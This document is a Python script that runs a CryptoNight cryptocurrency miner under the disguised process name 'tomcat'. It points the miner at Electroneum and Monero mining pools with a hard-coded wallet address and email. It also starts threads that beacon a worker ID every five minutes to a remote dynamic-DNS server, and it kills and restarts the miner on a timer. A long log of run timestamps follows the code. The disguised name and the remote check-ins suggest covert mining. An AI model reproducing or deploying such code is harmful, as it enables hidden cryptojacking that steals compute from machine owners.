import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:46:07.716629
#2018-02-17 17:34:05.546948
#2018-02-17 19:22:07.279201
#2018-02-17 21:12:06.540868
#2018-02-17 22:56:04.852636
#2018-02-18 00:43:06.148188
#2018-02-18 02:33:05.643090
#2018-02-18 04:21:07.173120
#2018-02-18 06:12:06.142459
#2018-02-18 08:02:05.335659
#2018-02-18 09:50:05.705938
#2018-02-18 11:37:05.956275
#2018-02-18 13:22:06.678893
#2018-02-18 15:12:05.582625
#2018-02-18 17:01:04.844674
#2018-02-18 18:48:03.782098
#2018-02-18 20:36:01.871007
#2018-02-18 22:22:01.812181
#2018-02-19 00:11:04.688279
#2018-02-19 01:57:01.358995
#2018-02-19 03:44:04.909659
#2018-02-19 05:30:06.729193
#2018-02-19 07:17:06.905083
#2018-02-19 09:06:07.359437
#2018-02-19 10:56:01.356949
#2018-02-19 12:45:01.441483
#2018-02-19 14:35:01.982186
#2018-02-19 16:24:08.046532
#2018-02-19 18:11:08.370031
#2018-02-19 19:59:07.768362
#2018-02-19 21:49:06.615730
#2018-02-19 23:35:01.530287
#2018-02-20 01:22:07.531878
#2018-02-20 03:11:03.726051
#2018-02-20 04:57:06.962503
#2018-02-20 06:39:05.945501
#2018-02-20 08:24:07.142516
#2018-02-20 10:09:07.545776
#2018-02-20 11:54:08.722063
#2018-02-20 13:43:11.755345
#2018-02-20 15:28:06.497283
#2018-02-20 17:15:12.195534
#2018-02-20 19:04:06.843405
#2018-02-20 20:53:04.453692
#2018-02-20 22:37:05.561186
#2018-02-21 00:19:04.344276
#2018-02-21 02:05:04.034276
#2018-02-21 03:52:04.496910
#2018-02-21 05:39:05.616050
#2018-02-21 07:28:01.822630
#2018-02-21 09:12:05.564313
#2018-02-21 11:01:10.157839
#2018-02-21 12:50:12.654957
#2018-02-21 14:38:07.305521
#2018-02-21 16:24:12.250487
#2018-02-21 18:16:04.589574
#2018-02-21 20:01:15.115324
#2018-02-21 21:50:10.064475
#2018-02-21 23:36:05.895031
#2018-02-22 01:26:01.931710
#2018-02-22 03:15:08.494044
#2018-02-22 05:03:01.250200
#2018-02-22 06:45:09.060150
#2018-02-22 08:34:07.459779
#2018-02-22 10:21:08.819376
#2018-02-22 12:07:07.309478
#2018-02-22 13:52:11.165720
#2018-02-22 15:41:05.634277
#2018-02-22 17:28:08.644843
#2018-02-22 19:15:14.208233
#2018-02-22 21:08:07.108313
#2018-02-22 22:53:05.446836
#2018-02-23 00:40:06.643780
#2018-02-23 02:26:07.427834
#2018-02-23 04:16:05.480354
#2018-02-23 06:03:05.273116
#2018-02-23 07:50:07.958010
#2018-02-23 10:07:05.254573
#2018-02-23 11:58:01.439084
#2018-02-23 13:47:01.946445
#2018-02-23 15:37:06.763172
#2018-02-23 17:26:04.115290
#2018-02-23 19:13:10.886206
#2018-02-23 20:57:08.014171
#2018-02-23 22:43:06.377132
#2018-02-24 00:30:01.487583
#2018-02-24 02:21:04.220174
#2018-02-24 04:12:06.857577
#2018-02-24 06:01:06.662193
#2018-02-24 07:50:08.742898
#2018-02-24 09:33:06.008226
#2018-02-24 11:26:06.371795
#2018-02-24 13:15:08.610829
#2018-02-24 15:07:07.930998
#2018-02-24 16:56:01.435894
#2018-02-24 18:45:07.180776
#2018-02-24 20:36:07.269026
#2018-02-24 22:44:01.441725
#2018-02-25 02:06:01.217635
#2018-02-25 05:55:05.993427
#2018-02-25 11:38:07.778913